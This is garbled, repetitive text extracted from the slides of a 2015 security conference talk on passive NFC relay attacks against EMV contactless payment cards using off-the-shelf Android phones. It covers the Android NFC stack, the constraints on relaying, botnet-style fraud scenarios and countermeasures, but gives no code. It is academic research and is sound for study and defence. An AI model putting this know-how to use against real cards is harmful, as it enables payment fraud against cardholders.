Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
